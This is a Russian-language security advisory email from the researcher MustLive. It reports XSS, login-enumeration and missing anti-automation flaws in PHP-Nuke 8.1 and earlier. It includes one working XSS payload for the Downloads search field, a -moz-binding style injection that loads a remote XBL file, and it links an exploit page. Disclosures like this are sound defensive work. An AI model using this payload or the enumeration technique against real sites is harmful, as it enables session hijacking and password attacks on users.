Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting, Abuse of
Functionality и Insufficient Anti-automation уязвимостях в PHP-Nuke.
XSS (WASC-08):
POST запрос на странице http://site/modules.php?name=Downloads
"
style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')
В поле поиска.
Это версия для Mozilla и Firefox (до 3.0). Пример эксплоита:
http://websecurity.com.ua/uploads/2011/PHP-Nuke%20XSS.html
Abuse of Functionality (WASC-42):
http://site/modules.php?name=Your_Account&op=pass_lost
Через данный функционал можно выявлять логины в системе.
Insufficient Anti-automation (WASC-21):
Учитывая, что данный функционал не имеет защиты от автоматизированных
атак, это позволяет проводить автоматизированное выявление логинов в
системе (а также рассылку писем пользователям сайта). В дальнейшем
выявленные логины могут быть использованы для определения паролей
пользователей системы.
Уязвимы PHP-Nuke 8.1 и предыдущие версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/5009/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua